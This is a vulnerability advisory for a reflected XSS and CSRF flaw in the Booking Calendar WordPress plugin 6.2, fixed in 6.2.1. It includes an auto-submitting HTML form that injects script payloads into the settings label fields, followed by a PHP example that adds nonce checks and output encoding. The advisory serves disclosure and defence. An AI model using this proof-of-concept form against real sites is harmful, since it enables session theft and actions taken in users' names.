A Cross-Site Scripting vulnerability was found in the Booking Calendar WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29, a community summer event in which a large group of security bug hunters from around the world collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE-20160714-0003
These issues were successfully tested on Booking Calendar WordPress Plugin version 6.2.
This issue is resolved in Booking Calendar version 6.2.1.
The Booking Calendar WordPress Plugin is a booking system that provides an online reservation and availability-checking service for your site. A Reflected Cross-Site Scripting vulnerability exists in the Booking Calendar WordPress plugin. This vulnerability allows an attacker to perform any action with the privileges of the target user. The affected code is not protected with an anti-Cross-Site Request Forgery token. Consequently, it can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement).
The vulnerability exists in the wpdev_bk_settings_form_labels() function from booking/lib/wpdev-settings-general.php (line 1492).
All input fields on the Booking > Settings > Fields page are vulnerable to Cross-Site Scripting, e.g. http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=form.
All forms on the Booking > Settings > Import tab are also vulnerable to Cross-Site Scripting; however, a valid anti-CSRF token is required for this tab, e.g. http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=sync.
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=form" method="POST">
<input type="hidden" name="booking_form_field_label1" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_label2" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_label3" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_label6" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_values6" value="" />
<input type="hidden" name="booking_form_field_label4" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_active4" value="On" />
<input type="hidden" name="booking_form_field_label5" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
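The proof of concept above succeeds because the settings handler accepts the label values from any origin and echoes them back unencoded. As an added example that is not code from the Booking Calendar plugin, the following WordPress-style handler shows the two fixes that close this class of bug: a nonce check on save and attribute encoding on output. The function and option names (bc_demo_*) are hypothetical; the shims let the file run under plain php as well as inside WordPress.

```php
<?php
// Added example (not the plugin's code): a settings-form handler for the
// booking_form_field_label* parameters with CSRF and XSS protection.
// Shims so the file also runs under plain `php`; inside WordPress the
// real esc_attr()/sanitize_text_field() are used instead.
if (!function_exists('esc_attr')) {
    function esc_attr($s) { return htmlspecialchars((string)$s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($s) { return trim(strip_tags((string)$s)); }
}

// 1. Saving: refuse the request unless it carries a valid nonce bound to
//    this action and the user may manage settings. A form posted from a
//    third-party site cannot supply the nonce, so the request is rejected.
function bc_demo_save_labels(array $post): array {
    if (function_exists('check_admin_referer')) {
        check_admin_referer('bc_demo_save_labels', 'bc_demo_nonce'); // dies on failure
        if (!current_user_can('manage_options')) { wp_die('Insufficient privileges'); }
    }
    $labels = [];
    for ($i = 1; $i <= 6; $i++) {
        $key = "booking_form_field_label$i";
        if (isset($post[$key])) {
            // Strip tags on input; output encoding below is still required.
            $raw = function_exists('wp_unslash') ? wp_unslash($post[$key]) : $post[$key];
            $labels[$key] = sanitize_text_field($raw);
        }
    }
    if (function_exists('update_option')) { update_option('bc_demo_labels', $labels); }
    return $labels;
}

// 2. Rendering: encode every stored value when it is echoed back into the
//    form, so a value that reached the database cannot break out of the
//    value="" attribute; the nonce field is emitted with the form.
function bc_demo_render_fields(array $labels): string {
    $html = '';
    if (function_exists('wp_nonce_field')) {
        $html .= wp_nonce_field('bc_demo_save_labels', 'bc_demo_nonce', true, false);
    }
    foreach ($labels as $name => $value) {
        $html .= sprintf('<input type="text" name="%s" value="%s" />' . "\n",
                         esc_attr($name), esc_attr($value));
    }
    return $html;
}

// Constructed input of the kind the PoC submits, run through both steps.
$saved = bc_demo_save_labels(['booking_form_field_label1' => '"><script>alert(document.domain)</script>']);
echo bc_demo_render_fields($saved);
```

Under plain php the payload is rendered as `&quot;&gt;alert(document.domain)` inside the attribute; under WordPress the same request would additionally be stopped by check_admin_referer() before any value is stored.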